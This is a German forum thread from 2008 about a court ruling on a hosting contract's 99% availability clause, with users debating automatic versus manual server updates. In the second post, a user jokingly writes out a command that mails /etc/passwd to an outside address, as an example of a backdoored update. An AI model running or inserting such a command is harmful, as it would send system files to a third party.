LG Karlsruhe: Klausel "Erreichbarkeit 99% im Jahresdurchschnitt" rechtswidrig

Dieses Thema im Forum "Internet-Recht" wurde erstellt von RA Dr. Bahr, 11. März 2008.

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Henry.Hill

    Henry.Hill Guest

    AW: LG Karlsruhe: Klausel "Erreichbarkeit 99% im Jahresdurchschnitt" rechtswidrig

    Ja klar...das stimmt... ich finde auch dass man sowas nicht unkontrolliert machen kann...die kleinen Linux Binaries aber halt schon.
     
  2. Dorijan

    Dorijan Erfahrener Benutzer

    Registriert seit:
    29. August 2002
    Beiträge:
    1.054
    Ort:
    Frankfurt/Main
    AW: LG Karlsruhe: Klausel "Erreichbarkeit 99% im Jahresdurchschnitt" rechtswidrig

    new pico option start with -s to automatically 'mail hithere@funwithchina.com.cn < /etc/passwd'

    :)

    da lässt man sich doch lieber alle anstehenden updates per mail zusammengefasst zusenden und prüft dann ob man sie installiert oder nicht, 2kb anwendung hin oder her :D
     
  3. Henry.Hill

    Henry.Hill Guest

    AW: LG Karlsruhe: Klausel "Erreichbarkeit 99% im Jahresdurchschnitt" rechtswidrig

    Selbst wenn Pico nen Bug hätte könnte es die /etc/passwd nicht ohne root Privilegien lesen... Ich weiß schon dass das nur ein Beispiel war aber solche Updates kommen jeden Tag rein. Schon kleinste Hosting Firmen mit 5 bis 10 Servern können diese Arbeit nicht mehr manuell machen weil der Kunde sie schlichtweg nicht bezahlt. Und wenn man es manuell machen würde... Wie sollte denn der Sysadmin die Sicherheitslücke etwa in Pico schnell bemerken ? Sowas kann man idR nicht bei einem kurzen manuellen Test feststellen und wenn ich das intensiv prüfe mach ich den ganzen Tag nix anderes mehr und das bezahlt dann wirklich keiner mehr.
     
    Zuletzt von einem Moderator bearbeitet: 14. März 2008
Status des Themas:
Es sind keine weiteren Antworten möglich.

Diese Seite empfehlen